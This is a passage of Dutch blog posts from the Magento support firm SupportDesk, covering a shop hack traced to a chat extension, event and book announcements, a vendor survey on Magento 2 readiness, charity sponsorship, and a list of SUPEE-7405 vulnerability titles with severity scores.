    Bij wie-doet-wat.nu bleek uiteindelijk dat de shop gehackt had kunnen worden doordat een bepaalde chat-extensie een lek had. De klant had deze extensie zelf toegevoegd, zodat hij goed kon communiceren met zijn klanten. Dit lek werd gebruikt door de hackers met behulp van de al gehackte computer van de klant. Na het verwijderen van de extensie en het terugzetten van een schone back-up was het probleem verholpen.

    meer info   of   

    Bel nu! 020 337 5961

    Wouter den OtterDit artikel is geschreven door Wouter den Otter, mede-oprichter van SupportDesk en vervult zijn rol als Algemeen Directeur.

    LinkedIn

  • Exact meets Ecommerce

    Exact meets Ecommerce
    Op 29 september 2016 is het Exact E-commerce event van het jaar, Exact meets Magento. Al zes jaar organiseert men dit event waarin Exact en Magento samenkomen. Dit jaar is het thema; Time for serious business, time for interaction.

    Dit thema is gekozen omdat het event dit jaar in het teken staat van ‘serieuze zaken’. Er zijn veel inhoudelijke en diepgaande sessies waar je echt iets leert. Er spreken allerlei praktijkgerichte professionals die je bruikbare informatie kunnen geven om je business te verbeteren. Ook is er veel tijd voor interactie.

    Is Nederland klaar voor Magento 2.0?

    Ook onze Ray Bogman zal spreken op dit event vertellen over Magento 2.0. Inmiddels is het al 317 dagen geleden dat Magento is uitgekomen. Is Nederland klaar voor Magento 2? Wat is Magento 2 nu eigenlijk? Wat kan het beteken voor jouw webwinkel? En niet geheel onbelangrijk: kan ik nu overstappen/migreren naar Magento 2 met behoud van mijn huidige koppelingen/interfaces? Ray Bogman geeft antwoord op deze vragen tijdens zijn sessie.

    De tickets voor dit event zijn geheel GRATIS! Via de website zijn de tickets gemakkelijk te bemachtigen en heb je ze direct in je mailbox.

    De kaartverkoop gaat razendsnel, het evenement is eigenlijk zo goed als vol. Gelukkig zijn er voor de last-minute beslissers nog een beperkt aantal extra kaarten beschikbaar gesteld. Dus wil jij ook sessies bijwonen van topsprekers zoals CEO Stefan van den Berg (Afterpay), internetmarketeer Alex van Ginneken en autocoureur/internet goeroe Tom Coronel maar heb je nog geen ticket? Grijp dan je kans en bestel nu want hierna is vol ook écht vol!

    Extra informatie over het evenement is te vinden op www.exactmeetsecommerce.nl

    meer info   of   

    Bel nu! 020 337 5961

    Dit artikel is geschreven door Hiltje Conradi, medewerker van SupportDesk B.V.

    LinkedIn | Twitter

     

  • Aankondiging: "Meet Magento Nederland 2016" (12 en 13 mei)

    Meet Magento NL 2016 utrecht logo


    Nog maar 6 dagen en dan is het zover. De 8e editie van het internationale “Meet Magento Nederland” event. Dit event zal plaats vinden op donderdag 12 en vrijdag 13 mei 2016 in de Jaarbeurs in Utrecht. Meet Magento Nederland is het grootste en meest innovatieve Magento event in Nederland.

    Donderdag 12 mei

    Donderdag 12 mei is gericht op nieuwe webwinkeliers en webwinkeliers die willen overstappen van Magento 1 naar Magento 2. Op deze dag zal alle informatie die u nodig heeft over de mogelijkheden met Magento worden verstrekt. Bent u aan het eind van deze dag enthousiast geworden over Magento (of wellicht was u al groot fan), heeft u brandende vragen of bent u gewoon geïnteresseerd? Dan heeft u geluk want aan het eind van deze eerste dag zal een netwerkborrel plaatsvinden. Hier kunt u terecht voor een drankje en een versnapering en wellicht een leuk en interessant gesprek, over Magento, met SupportDesk oprichter Ray Bogman.

    Vrijdag 13 mei

    Vrijdag 13 mei zal voornamelijk gaan over e-commerce & innovatie en development. Deze dag is vooral bedoeld voor Magento webwinkeliers en developers. De laatste tips, tricks en tools, waarmee Magento 1 en Magento 2 webshops naar een hoger niveau getild kunnen worden, zullen worden getoond en besproken. Tijdens deze tweede dag van Meet Magento Nederland zal SupportDesk oprichter Ray Bogman (en tevens co-schrijver van het boek: “Magento 2 Cookbook”) spreken over het upgraden van Magento Enterprise 1.10.x naar Magento Community 1.9.x. Daarnaast staat SupportDesk met een Magento Doctor booth op deze dag. Bent u Ray Bogman misgelopen op de eerste dag dan kunt u het vandaag nog een keer proberen. Tevens is er bij de booth de mogelijkheid om uw Magento 2 Cookbook te laten signeren.

    Zaterdag 14 mei: Hackaton

    Traditiegetrouw vindt op de derde dag (zaterdag 14 mei 2016) de Magento Hackaton plaats op een locatie dichtbij de Jaarbeurs in Utrecht. Deze is bedoeld voor Magento developers.

    Meet Magento Awards

    Voor de tweede keer organiseert Meet Magento Nederland de Meet Magento Awards. Deze is in het leven geroepen om Magento innovaties de erkenning te geven die ze verdienen. Het Magento 2 Cookbook, geschreven door Ray Bogman en Vladimir Kerkhof is genomineerd voor een award in de categorie Magento 2.0. Als u wilt dat het Magento 2 Cookbook wint breng dan uw stem uit door op onderstaande link te klikken. Stemmen kan tot 8 mei (geen registratie nodig).

    VOTE NOW!

    Tickets voor Meet Magento Nederland zijn hier te verkrijgen.

    meer info   of   

    Bel nu! 020 337 5961

    Dit artikel is geschreven door Hiltje Conradi, medewerker van SupportDesk B.V.

    LinkedIn | Twitter

     

  • Magento 2 Cookbook - Award Nominated

    Magento 2 Cookbook Awards 2016

    SupportDesk is happy to announce that the Magento 2 Cookbook written by Ray Bogman & Vladimir Kerkhoff has been nominated for the Meet Magento NL 2016 Award. The awards consist of 5 categories. The Magento 2 Cookbook has been nominated with two other contenders in the Magento 2.0 category. The Magento 2.0 category was created to encourage Magento 2 projects. If you would like to see the Magento 2 Cookbook win the awards please vote by clicking the link below (no registration needed). Voting is possible until the 8th of May. 

    VOTE NOW!

    Voting until the 8th of May

    Magento 2 Cookbook

    The Magento 2 Cookbook contains 342 pages and 50 of in-depth Magento 2 recipes. Ray Bogman & Vladimir Kerkhof spent more than 700+ hours in research, development and writing in a 4 month period. In April 2016, the book got published just before the start of Magento Imagine Las Vegas

    Below you will find an introduction as well as an impression video of the Magento 2 Cookbook release.

    Meet Magento 2016 (12th and 13th of May)

    Ray Bogman & Vladimir Kerkhof will be sigining Magento 2 Cookbook copies during the Meet Magento 2016 event. If you are interested, visit the Magento Doctor booth the 13th of May 2016 at the Jaarbeurs Utrecht. When you would like to know more about the background story on how SupportDesk upgraded Magento Enterprise 1.10.x to Magento Community 1.9.x, checkout the Meet Magento schedule. Ray Bogman will give a lecture on this during the event. 

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Tweede editie web development bootcamp, gebaseerd op Magento, is een feit!

    SupportDesk &  Frissr Bootcamp 2

    Tot op heden gaf SupportDesk alleen trainingen met betrekking tot Magento en Magento 2. Echter SupportDesk slaat een nieuwe weg in: naast het trainen van mensen voor Magento en Magento 2 zal SupportDesk een bijdrage leveren aan het trainen van young e-commerce IT professionals (studenten en ex-studenten) om deze klaar te stomen voor de praktijk.

    Afgelopen maandag 25 april 2016 vond de tweede sessie uit een reeks van 10 plaats van de web development bootcamp. In samenwerking met FRISSR organiseert SupportDesk een web development bootcamp, gebaseerd op Magento 2, waarbij technische studenten de mogelijkheid krijgen om, naast de conceptuele vaardigheden die ze op doen tijdens hun studie, zichzelf klaar te stomen voor de praktijk. De web development bootcamp transformeert studenten tot junior web developer. Door training en ondersteuning worden studenten geholpen om op bedrijfsniveau bekwaam te worden met als doel het verkrijgen van een bijbaan met doorgroeimogelijkheden. 

    Ontstaan web development bootcamp

    Het idee voor een web development bootcamp is ontstaan doordat Ray Bogman (oprichter SupportDesk) en Quincy Dalh (oprichter FRISSR) merkten dat wanneer het aankomt op de kennis van technische studenten er een gat is tussen de theorie en de praktijk. Studenten hebben veel theoretische kennis maar missen bepaalde vaardigheden om in de praktijk aan de slag te kunnen gaan. Daarnaast merkte Ray Bogman dat e-commerce steeds belangrijker wordt en er een groeiend tekort is aan e-commerce specialisten binnen de IT. (Bij SupportDesk zijn ze eigenlijk altijd op zoek naar analytische jong professionals met technische affiniteit die een aanvulling kunnen geven wat betreft e-commerce.) Er is veel vraag in de markt naar B2B en B2C verkoop maar er zijn maar weinig mensen die hierbij kunnen helpen. Het gevolg is dat er wachttijden ontstaan voor ondernemers die graag hun ideeen in de praktijk willen brengen. (De vraag naar e-commerce IT specialisten is groot en het aanbod te klein). De wil is er, echter de economische groei is een beperkende factor. Door een nieuwe aanwas, bijvoorbeeld door het opleiden van studenten door middel van deze web development bootcamp, zou Nederland een doorgroei kunnen maken wat betreft e-commerce.

    Inhoud web development bootcamp

    De 31 deelnemers van de web development bootcamp vormen een gemêleerd gezelschap. Bachelor studenten informatiekunde, master studenten artificial intelligence, computer science studenten, lifestyle informatics, informatie multimedia management, informatica studenten en ex-studenten doen deze eerste editie allemaal mee. De meeste studenten zijn afkomstig van de Vrije Universiteit van Amsterdam (VU, de universiteit waar FRISSR gelieerd is) daarnaast zijn ook de Universiteit van Amsterdam (UvA) en de Universiteit van Utrecht (UU) vertegenwoordigd.

    Motivatie vanuit SupportDesk

    SupportDesk vindt het erg belangrijk om maatschappelijk betrokken te zijn als ondernemer. In een eerdere blog kwam het bedrijfsambassadeurschap van SupportDesk voor Oxfam Novib naar voren. Dit keer gaat het meer om een sociale bijdrage aan de Nederlandse gemeenschap. Ray Bogman vindt het erg belangrijk dat kennis gedeeld wordt met anderen. Het organiseren van een web development bootcamp leent zich hier erg goed voor. Meerdere partijen hebben baat bij deze bootcamp. Zowel de deelnemers als de ondernemers waar de deelnemers uiteindelijk terecht zullen komen. Het kost ondernemers veel tijd, en daarmee geld, om mensen op te leiden (en uiteindelijk te moeten ontslaan wanneer er niet aan de verwachtingen voldaan kan worden). De bootcamp zorgt ervoor dat het kaf van het koren wordt gescheiden en deelnemers meteen aan de slag kunnen. Daarnaast zal bij uitbreiding van de web development bootcamp in de toekomst de Nederlandse economie een boost kunnen krijgen.

    Web development bootcamp toekomst

    Deze web development bootcamp is de eerste uit hopelijk een groot aantal. Er zijn mogelijkheden genoeg om uit te breiden. Deze editie is gebaseerd op Magento 2. Mocht u enthousiast zijn geworden over de bootcamp en/of wellicht denken iets te kunnen en willen bijdragen dan horen wij dit graag.

    meer info   of   

    Bel nu! 020 337 5961

    Dit artikel is geschreven door Hiltje Conradi, medewerker van SupportDesk B.V.

    LinkedIn | Twitter

     

  • Presentatie: "Magento 2 Cookbook" door Ray Bogman en Vladimir Kerkhof

    mage2cookbook-small

    Na lang wachten is het gelukkig zover... Het Magento 2 Cookbook is uit. Op donderdag 28 april 2016 om 15.00 uur zullen de auteurs Ray Bogman (oprichter SupportDesk B.V.) en Vladimir Kerkhof (medewerker SupportDesk B.V.) het "Magento 2 cookbook" presenteren op het hoof dkantoor van ByteSupportDesk B.V. (De ruyterkade 139 1101 AC Amsterdam). Het Magento 2 cookbook is een must-read voor iedereen die Magento 2 in de planning heeft. Het boek leert je wat je aan Magento 2 hebt en geeft je concrete 'recepten' hoe je met Magento 2 kunt werken. 

    Wat

    Presentatie Magento 2 cookbook. De presentatie middag leert je wat het Magento 2 cookbook te bieden heeft. De twee auteurs Ray Bogman en Vladimir Kerkhof zullen uitgebreid ieder hoofdstuk behandelen. Alles komt aan bod: van het opzetten en optimaliseren van je installatie tot het ontwikkelen van modules en thema's. Na de presentatie zal er een signeersessie plaats vinden met champagne en lekkere versnaperingen. Ray Bogman en Vladimir Kerkhof zullen genoeg tijd hebben om nog eens goed aan de tand gevoeld te worden over Magento 2 en natuurlijk het Magento 2 cookbook. Daarnaast is het een mooie gelegenheid om met andere Magento geintereseerden te netwerken. 

    Voor wie 

    Iedereen die geinteresseerd is in Magento 2. Of je systeemontwikkelaar, techneut, webwinkeleigenaar of student bent, maakt niet uit zolang je maar fan bent van Magento en graag meer te weten wilt komen over komen het Magento 2 cookbook

    Wanneer

    Donderdag 28 april 2016 om 15.00 uur.

    Waar

    Hoofdkantoor van Byte en SupportDesk B.V. (De Ruiyterkade 139, 1101 AC Amsterdam).

    Vergeet niet of je RSVP door te geven. Alleen dan is het bijwonen van de presentatie mogelijk.

    Reserveer nu voor de presentatie

    Tip: Neem je visitekaartje mee en gooi hem in de grabbelton. Aan het eind van de presentatie zullen er 3 namen gegrabbeld worden die een exemplaar van het Magento 2 cookbook mee naar huis mogen nemen. (Mocht je niet in de prijzen zijn gevallen, en het boek nog niet in bezit hebben, dan is het boek hier te bestellen. Daarnaast is er een mogelijkheid om ter plekke een gesigneerd exemplaar te kopen voor 40 Euro)

    meer info   of   

    Bel nu! 020 337 5961

    Dit artikel is geschreven door Hiltje Conradi, medewerker van SupportDesk B.V.

    LinkedIn | Twitter

     

  • Is Nederland Magento 2 Ready?

    Volgens onze bronnen zijn er, na 2 maanden, op dit moment 400+ shops gemigreerd naar Magento 2. 500+ Magento 2 extenties zijn beschikbaar. Zie hier een overzicht van de wereldwijd beschikbare Magento 2 extenties. 

    Bij SupportDesk zijn we echter benieuwd of Nederland al Magento 2 ready is. Op 20 en 21 januari werden de Webwinkel Vakdagen 2016 gehouden waarbij SupportDesk B.V. en veel leveranciers van Magento 2 modules aanwezig waren. Zijn deze leveranciers al Magento 2 ready? SupportDesk heeft tijdens deze Webwinkel vakdagen een aantal leveranciers van Magento extenties gesproken. Hierbij kwam SupportDesk erachter dat veel leveranciers nog niet Magento 2 ready waren op dat moment. Hoe zit dat nu, zijn er inmiddels al meer leveranciers Magento 2 ready? Welke levaranciers zijn Magento 2 ready en welke niet? 

    De volgende 3 vragen hebben we de leveranciers voorgelegd:

    1. Is hun Magento plugin klaar voor Magento 2?
    2. Hoe denken ze over Magento 2?
    3. Verwacht men een grote overgang naar Magento 2?
    magento-2

    Antwoorden van de leveranciers:

    Is Sisow Magento 2 ready?

    1. De Sisow betaal plugin is Magento 2 ready. Ze bieden 3 plugins aan voor de verschillende versies van Magento een van deze is een plugin voor Magento 2.
    2. Sisow houdt zich voornamelijk bezig met het betaalgedeelte van Magento. Het betalen gaat prima. De standaard account pagina voor het betalen wordt echter nogal omslachtig gevonden. Sisow weet niet zo goed hoe de rest van Magento 2 in elkaar zit aangezien ze hier niet mee te maken krijgen.   
    3. Het zal nog even duren voordat mensen over zullen gaan naar Magento 2. Er zijn nog weinig plugins beschikbaar. De oorzaak hiervan is dat ontwikkelen moeilijker is dan bij Magento 1. Ook het installeren is erg lastig.  

    Is Postcode.nl Magento 2 ready?

    1. Postcode.nl is momenteel bezig met het ready maken van hun plugin voor Magento 2. Ze verwachten binnen een maand live te kunnen gaan. 
    2. Hier kunnen ze niks over zeggen.
    3. Postcode.nl krijgt regelmatig de vraag of ze al Magento 2 ready zijn. Vanuit dit oogpunt gezien zou je verwachten dat veel bedrijven over willen gaan of al over zijn op Magento 2. Meer durft Postcode.nl er echter niet over te zeggen. 

    Is Multisafepay Magento 2 ready?

    1. De plugin van Multisafepay is sinds 2 weken klaar voor Magento 2. Echter deze is nog niet vergelijkbaar met de Magento 1 plugin. De Magento 2 plugin is goed in ontwikkeling. 
    2. Op het moment ziet Multisafepay dat de eerste webbouwers Magento 2 aan het uitproberen zijn. Er zitten alleen nog veel kinderziektes in Magento 2.
    3. Multisafepay verwacht dat Magento 2 steeds meer marktaandeel zal verkrijgen. Er zijn veel geluiden van hun merchants dat ze toch nog even wachten met de overstap naar Magento 2 vanwege de vele kinderziektes. 
     

    Is Omnichannel (Icepay) Magento 2 ready?

    De plugin voor Magento 2 is in ontwikkeling en naar verwachting zal deze volgende maand klaar zijn voor de test fase.

    Is Coscale Magento 2 ready?

    1. De Magento 2 plugin van Coscale is nog niet in ontwikkeling, maar dit staat wel in de planning. De planning voor deze CoScale Magento 2 module is medio Q2.
    2. Ze zijn nog  niet echt met Magento 2 bezig. Ze willen nu vooral Magento 1 stabiel krijgen. 
    3. .

    Is Sooqr Magento 2 ready?

    1. De plugin is nog niet Magento 2 ready. Hun systeem echter wel. Sooqr heeft alleen datafeed nodig. Het is voor Sooqr geen noodzaak om over te gaan op Magento 2. Ze hebben het niet per se nodig. Momenteel zijn ze bezig de oude plugin te hermaken. Het kan nog enkele maanden duren voordat ze Magento 2 ready zullen zijn.
    2. Sooqr heeft niet heel veel met Magento te maken. Ze horen hele wisselende verhalen van klanten over Magento 2.
    3. Sooqr denkt dat wanneer er een nieuwe site gebouwd moet worden mensen erg in dubio zullen zitten of ze Magento 1.9 of Magento 2.0 zullen kiezen. Wanneer er voor Magento 1.9 wordt gekozen loop je al snel achter. Echter wanneer voor Magento 2 wordt gekozen kan dit ook problemen geven omdat het nog zo nieuw is. De mensen die al een Magento website hebben zullen niet heel snel overstappen. Er zitten nog veel problemen in Magento 2.

    Is Mailplus Magento 2 ready?

    1. Vanaf 1 mei gaat Mailplus hun plugin testen op Magento 2. Wanneer alles goed gaat zullen ze vanaf 1 juni live gaan.
    2. Mailplus heeft Magento 2 zelf nog niet kunnen testen. Ze begrepen wel van de developers dat er nog veel bugs in zitten. Voor een live omgeving is het af te raden om over te stappen.
    3. Ze hebben bij klanten nog niet echt gemerkt dat ze over zijn gestapt op Magento 2. Deze versie van Magento is waarschijnlijk nog niet goed genoeg als je al live bent. Het is te veel risico om over te gaan. Daarnaast zullen er misschien functionaliteiten verloren gaan wanneer plugins niet ondersteunt worden.

    Is Klarna Magento 2 ready?

    1. De Magento 2 plugin voor Klarna komt er wel aan, maar ze zijn er op dit moment niet mee bezig.
    2.  .
    3.  .

    Is active Ants al Magento 2 ready?

    1. Na de zomer zal de plugin Magento 2 ready zijn. Het hangt een beetje van de vraag van de klanten af.
    2. Er zijn grote verbeteringen qua ontwikkeling maar er is wel een erg stijle leercurve.
    3. Voor nieuwe gebruikers van Magento is Magento 2 een aanrader. Het nadeel is dat veel aanbieders van extenties er nog niet klaar voor zijn. Veel betaalmethoden zijn nog niet Magento 2 ready. Het zal waarschijnlijk even op zich laten wachten voordat mensen Magento 2 echt gaan gebruiken.

    Is Belco al Magento 2 ready?

    1. Nee nog niet. Belco heeft nog geen klanten die een Magento 2 omgeving hebben en een Magento 2 plugin nodig zullen hebben. Het heeft geen prioriteit. Zodra klanten er naar gaan vragen zullen ze bij Belco tijd vrij maken om de plugin klaar te maken voor Magento 2. Op dit moment hebben ze er nog geen tijd voor.
    2. Hebben niet genoeg kennis van Magento om deze vraag te kunnen beantwoorden.
    3. Belco denk dat er niet snel over zal worden gegaan op Magento 2. Mensen hebben geen inzicht in wat er allemaal komt kijken bij een upgrade. Het is daarnaast ook te ingewikkeld om even snel te doen.

    Is Channable al Magento 2 ready?

    1. Channable is op dit moment aan het poorten naar Magento 2.
    2. De bouwers van de plugin zijn veel met Magento aan de slag. Ze vertelden dat er drastische veranderingen zijn waarbij belangrijke functionaliteiten uitgesloten worden.
    3. Bij Channable verwachten ze dat mensen zullen wachten totdat Magento versie 2.1 of zelfs 2.2 uit is voordat er overgestapt wordt. Er zullen op dit moment nog wel veel bugs in Magento 2 zitten aangezien het een volledige rewrite is.

    Conclusie

    Uit bovenstaande antwoorden blijkt dat leveranciers de kat uit de boom aan het kijken zijn. Er wordt geen aanstalten gemaakt om over te stappen naar Magento 2 omdat volgens de meeste leveranciers een update van een applicatie naar Magento 2 op dit moment nog kinderziektes zal vertonen. SupportDesk is echter nog niet klaar met het onderzoek. We zullen de lijst met leveranciers aan blijven vullen met de meest recente gegevens. Voor nu echter:
     
    To be continued.....
  • Keystone Magento 2: "Magento 2 Cookbook" door Ray Bogman en Vladimir Kerkhof

    Magento 2 CookbookBegin april 2016 is het zover: het boek "Magento 2 Cookbook" geschreven door Ray Bogman (CTO & co-founder SupportDesk B.V.) en conculega Vladimir Kerkhof zal gepubliceerd worden. Het boek bevat meer dan 400 bladzijdes en 50 praktische Magento 2 "recepten" die zullen helpen om de volle potentie van Magento te benutten met als doel een professionele webshop te bouwen. Het is geschreven voor Magento gebruikers (merchants, frontend developers, backend developers and devops) die meer inzicht en expertise willen vergaren in het managen, ontwerpen en uitbreiden van hun Magento webshop. Kennis van Magento en bekendheid met programmeren worden verwacht bij het lezen van dit kookboek.

    Door het kookboek format hoeft het boek niet van begin tot eind gelezen te worden maar kunnen er bepaalde hoofdstukken/ recepten uitgekozen worden die interessant lijken. Het is erg breed van opzet. Installeren, configureren, creëren en optimaliseren van een Magento 2 omgeving komen aan bod. Het Magento 2 Cookbook bevat de volgende hoofdstukken: Install Magento 2 on Apache and Nginx, Mangeto 2 system tools, Enable performance in Magento 2, Create catalog and categories, Managing your store, Creating a custom Magento 2 theme, Create a Magento 2 extention (basics), Creating a Magento 2 extention (advanced). Meer informatie over de hoofdstukindeling vindt u hier.

    Magento 2 Trainingen

    Het Magento 2 Cookbook is een samenwerking van Ray Bogman en Vladimir Kerkhof. Zowel Ray als Vladimir zijn geen onbekenden in de wereld van Magento. Beiden kennen elkaar van het werk bij SupportDesk B.V waarbij ze onder andere Magento 2 trainingen geven aan geïnteresseerden (meer informatie). De samenwerking voor dit boek is een logisch besluit aangezien ze elkaar qua kennisgebieden goed aanvullen. Vladimir heeft erg veel kennis van modules en de back-end gedeelte. Ray daarentegen is geen back-end programmeur maar heeft erg veel andere kwaliteiten. Het front-end gedeelte van het boek is zowel door Ray als door Vladimir samen bedacht.

    Energiek, leerzaam en rustgevend project

    Uit het interview met Ray Bogman ten behoeve van deze blogpost bleek dat met de komst van Magento 2 precies het juiste moment daar was om een boek te schrijven. Ray is al eerder benaderd voor het schrijven van een boek maar zowel tijdgebrek als "dyslexie angst" weerhielden hem hiervan. Eerder verschenen 3 artikelen en 4 boeken reviews van zijn hand maar zelf een boek schrijven is een ander verhaal. Er is tot nu toe weinig geschreven over Magento 2. Hooguit 2 of 3 boeken. Voor Ray was het een mooie gelegenheid om nog meer kennis op te doen over Magento 2. Ook het overwinnen van zijn dyslexie angst en het delen van kennis met derden om Magento 2 succesvol te maken zijn belangrijke redenen gewest voor het schrijven van het " Magento 2 Cookbook". Al met al was het een "energiek, leerzaam en rustgevend project", aldus Ray Bogman. Hierbij doelde hij op zowel het schrijfproces als op het boek zelf. "Het is erg fijn om je te kunnen focussen op 1 ding".

    Magento Imagine

    Het "Magento 2 Cookbook" verschijnt begin april 2016. Het mogelijk om hier alvast een pre-order te plaatsen zodat u zeker bent van een exemplaar. De officiële lancering/presentatie van "Magento 2 Cookbook" zal plaatsvinden tijdens pre-imagine 2016 in Los Angeles. Mocht u toevallig in de buurt zijn, kom gezellig langs op de pre-imagine dag (zondag 10 april) voor een, door Ray Bogman, gesigneerd exemplaar.

    Magento 2 Cookbook Bestellen

    Winactie:

    Ben u inmiddels enthousiast geworden over het Magento 2 Cookbook? Het is mogelijk om een exemplaar te winnen. Het enige wat u hoeft te doen is de volgende vraag te beantwoorden. "Wat is de datum waarop Magento 2 gereleased werd?"

    Klik hier om uw antwoord in te vullen

    Meer informatie over "Magento 2 Cookbook" (o.a. Hoofdstukindeling, nieuws rondom het boek, contact informatie)

    Dit artikel is geschreven door Hiltje Conradi, medewerker van SupportDesk B.V.

    LinkedIn | Twitter

     

  • Shoppimon Webinar: Making the move to Magento 2

    magento2-logo

    Overweegt u uw Magento webshop te migreren naar Magento 2?

    Magento 2 is inmiddels al een tijdje beschikbaar. Men is te spreken over :

    • De verbeterde Performance
    • De nieuwe niveaus qua compatibiliteit
    • De flexibiliteit

    Maar betekent dit dat het tijd voor u is om 'over te stappen'?
    We snappen dat het een enorme taak lijkt, en daarom is in samenwerking met Shoppimon deze webinar georganiseerd, waar u meer inzicht kunt krijgen over de migratie naar Magento 2.

    Tijdens de webinar kunt u al uw Magento 2 vragen stellen en worden onder andere de onderstaande onderwerpen door de experts behandeld:

    • Wanneer kan ik de stap nemen om naar Magento 2 te migreren?
    • Hoe ziet het Magento 2 migratie proces eruit?
    • Wat zijn de 'best practices' tijdens de Magento 2 migratie?
    • Welke problemen kan ik verwachten tijdens de Magento 2 migratie?
    • Prestatie resultaten van Magento 2 sites

    Wees erbij en u kunt de eerste zijn die mee doet aan Shoppimon's Closed Beta voor Magento Monitoring.

    De aanwezigen maken ook nog kans op een exemplaar van Ray Bogman's aankomende boek 'Magento 2 Cookbook'.

    Planning:

    • Datum : 24-02-2016
    • Tijd: 7:00 PM (CET)

    Registreer nu voor de webinar.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento CoScale Workshop - Business metrics en Dashboards

    magento-user-group-workshop-2014

    De eerste Magento User Group meetup van 2016 die gehost wordt door SupportDesk zal gehouden worden op Donderdag 10 Maart 2016.
    De hands-on MUG workshop zal verzorgd worden vanuit het hoofdkantoor van True (Keienbergweg 100) te Amsterdam (15min lopen van Amsterdam Bijlmer Arena)
    Tijdens de MUG workshop zal er gewerkt worden met de CoScale tool.

    Wat is CoScale?

    Meer weten over CoScale en wat dit voor jouw Magento webshop kan betekeken, lees hier verder.

    02-03-2016: Aanpassing in het programma van de Magento User Group

    Planning:

    • 13.45: Inloop
    • 14:00 - 15:00 : Ray Bogman opent de middag met een discussieforum rond performance verschillen tussen Magento 1 en Magento 2
    • 15:00 - 15:30 : Presentatie: Welke E-commerce Business metrieken moet u in de gaten houden om betere resultaten uit uw Magento webshop te halen?
    • 15:30 - 18:30 : Praktische hands-on workshop na een korte introductie van het Coscale Platform: 'hoe ga je ermee aan de slag, wat kan je eruit halen...'
    • 18.30: Afsluiting met borrel

    Voor wie?  

    Deze workshop is bedoeld voor iedereen die met Magento werkt.

    Wat heb ik nodig voor de workshop?

    Vergeet niet je laptop mee te nemen.

    Wil jij je website vooraf al laten monitoren?

    Laat het ons dan weten door je naam en de url van je Magento webshop naar [email protected] te sturen.

    Vergeet je niet om een RSVP door te geven? Alleen dan is je aanmelding compleet!

    Registreer nu voor de workshop.

    meer info   of   

    Bel nu! 020 337 5961

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • SupportDesk steunt Oxfam Novib

    Logo Oxfam Novib BedrijvenambassadeurSinds 17 februari 2016 maakt SupportDesk deel uit van het netwerk van bedrijvenambassadeurs van Oxfam Novib. Als bedrijvenambassadeur bij Oxfam Novib steunt SupportDesk het microfinancierings-programma (Ondernemers voor ondernemers) en draagt daarmee bij aan de kansen voor kleine ondernemers in ontwikkelingslanden. Door middel van een maandelijkse donatie maakt Oxfam Novib het voor kleine ondernemers in ontwikkelingslanden mogelijk om hun eigen bedrijfje te starten. Hiermee kunnen ze aan de armoede ontsnappen. 

     

    Wie is Oxfam Novib?

    De missie van Oxfam Novib is “een rechtvaardige wereld zonder armoede”. Volgens Oxfam Novib wordt armoede door mensen veroorzaakt maar hebben mensen ook de kracht om armoede op te lossen. Oxfam Novib verbindt mensen, overheden en bedrijven over de hele wereld om te werken aan rechtvaardigheid.
    Naast het feit dat Oxfam Novib de armoede in de wereld probeert te bestrijden, door onder andere ondernemers in ontwikkelingslanden te steunen, brengt het zijn bedrijvenambassadeurs in Nederland met elkaar in contact. Oxfam Novib draagt hiermee tevens bij aan het ondernemersklimaat in Nederland. 

    Meer informatie over het microfinancierings-programma van Oxfam Novib en de mogelijkheid om bedrijvenambassadeur te worden vindt u hier.

    Waarom Oxfam Novib?

    SupportDesk wil graag maatschappelijk betrokken zijn nu dat financieel gezien haalbaar is. Ray Bogman (CTO & Co-founder SupportDesk) en Wouter den Otter (Managing Director SupportDesk) hebben zelf de kans gekregen om een bedrijf te starten en willen nu graag iets doen voor potentiële ondernemers in ontwikkelingslanden. Volgens SupportDesk is het mooie van Oxfam Novib dat ondernemers in ontwikkelingslanden niet alleen financiële steun krijgen maar ook kennis. Op deze manier kunnen bedrijven opgebouwd worden die ook daadwerkelijk een kans van slagen hebben. 

    meer info   of   

    Bel nu! 020 337 5961

  • Magento Security Update SUPEE-7405

    securityrelease

    Onlangs zijn er 20 veiligheidslekken in Magento ontdekt en opgelost in een patch SUPEE-7405. De lekken zijn aanwezig in alle versies van Magento t/m 1.9/x, dus zowel Magento Community als Magento Enterprise shops hebben hiermee te maken. Officieel zijn er enkel patches beschikbaar vanaf 1.4 en hoger, maar het betreft hier een issue dat impact heeft op alle versies.  

    Wat zijn de 20 lekken van SUPEE-7405?

    • Stored XSS via email address - APPSEC-1213
      • CVSSv3 Severity: 9.3 (Critical)
    • Stored XSS in Order Comments - APPSEC-1239
      • CVSSv3 Severity: 9.3 (Critical)
    • Stored XSS in Order - APPSEC-1260
      • CVSSv3 Severity: 7.5 (High)
    • Guest order view protection code vulnerable to brute-force attack - APPSEC-1270
      • CVSSv3 Severity: 7.5 (High)
    • Information Disclosure in RSS feed - APPSEC-1171
      • CVSSv3 Severity: 7.5 (High)
    • CSRF token not validated on backend login page - APPSEC-1206
      • CVSSv3 Severity: 7.4 (High)
    • Malicious files can be upload via backend - APPSEC-1306
      • CVSSv3 Severity: 6.5 (Medium)
    • CSRF leading to execution of admin actions after login - APPSEC-1179
      • CVSSv3 Severity: 6.1 (Medium)
    • Excel Formula Injection via CSV/XML export - APPSEC-1110
      • CVSSv3 Severity: 6.1 (Medium)
    • XSS in Product Custom Options - APPSEC-1267
      • CVSSv3 Severity: 5.9 (Medium)
    • Editing or Deleting Reviews without permission - APPSEC-1268
      • CVSSv3 Severity: 5.4 (Medium)
    • Disruption of email delivery - APPSEC-1177
      • CVSSv3 Severity: 5.3 (Medium)
    • CAPTCHA Bypass - APPSEC-1283
      • CVSSv3 Severity: 5.3 (Medium)
    • Admin path disclosure via Authorize.net - APPSEC-1208
      • CVSSv3 Severity: 5.3 (Medium)
    • XSS Payload in website's translation table - APPSEC-1214
      • CVSSv3 Severity: 4.7 (Medium)
    • CSRF Delete Items from Cart - APPSEC-1212
      • CVSSv3 Severity: 4.3 (Medium)
    • XSS via custom options - APPSEC-1276
      • CVSSv3 Severity: 4.8 (Low)
    • Risky serialized string filtering - APPSEC-1204
      • CVSSv3 Severity: 0 (Low)
